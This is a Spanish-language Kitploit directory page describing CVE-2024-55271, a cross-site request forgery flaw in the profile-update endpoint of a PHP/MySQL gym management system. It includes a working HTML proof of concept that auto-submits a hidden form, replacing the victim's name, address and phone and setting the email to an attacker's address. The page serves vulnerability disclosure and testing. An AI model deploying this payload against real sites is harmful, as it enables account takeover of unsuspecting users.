Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-55271 — Sistema de gestión de gimnasio con PHP y MYSQL | Kitploit
Herramientas/GitHubGitHub/shoaibalam112/cve-2024-55271
Análisis de VulnerabilidadesExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubshoaibalam112/cve-2024-55271

CVE-2024-55271

Sistema de gestión de gimnasio con PHP y MYSQL

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Sistema de Gestión de Gimnasio ( CVE-2024-55271 )

Un sistema de gestión de gimnasio construido con PHP y MySQL.

Auditor

Shoaib Alam - Perfil de LinkedIn

Descripción

Vulnerabilidad CSRF en la Sección de Actualización de Perfil

Se ha identificado una vulnerabilidad de Cross-Site Request Forgery (CSRF) en el Sistema de Gestión de Gimnasio. Este problema está presente en la funcionalidad de actualización de perfil del Panel de Usuario.

La aplicación actualmente carece de la implementación de tokens Anti-CSRF, lo que resulta en vulnerabilidad a ataques de Cross-Site Request Forgery (CSRF). Esta debilidad de seguridad afecta específicamente al endpoint /profile.php. Un atacante puede explotar esta falla para realizar modificaciones no autorizadas a información sensible del usuario, como dirección, nombre y número de teléfono. Esto podría comprometer la integridad de las cuentas de usuario y dar lugar a problemas de seguridad adicionales.

Endpoint vulnerable: /profile.php

Prueba de Concepto (PoC)

Descargar herramienta

A continuación se muestra una prueba de concepto que demuestra la vulnerabilidad CSRF. Este PoC fue generado usando Burp Suite Professional.

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/gym/profile.php" method="POST">
      <input type="hidden" name="fname" value="hacked" />
      <input type="hidden" name="lname" value="victim" />
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="mobile" value="9999999999" />
      <input type="hidden" name="state" value="hacked" />
      <input type="hidden" name="city" value="hacked" />
      <input type="hidden" name="address" value="hacked" />
      <input type="hidden" name="submit" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>